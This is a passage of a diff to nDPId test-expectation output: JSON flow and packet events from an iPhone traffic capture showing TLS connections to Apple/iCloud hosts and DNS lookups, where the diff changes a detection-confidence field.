{"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454599396,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454599396,"pkt":"AQBeAAD7xGGLNYKpCABFAABeopUAAP8RdUTAqAIR4AAA+xTpFOkASvALAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1582454599568,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454599568,"pkt":"MzMAAAACxGGLNYKpht1gCzl3ABA6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQA9fgAAAAABAcRhizWCqQ=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454599929,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454599929,"pkt":"xiwDYGpkxGGLNYKpCABFAABDumIAAP8Re+TAqAIRwKgCAf43ADUALyJV0zQBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 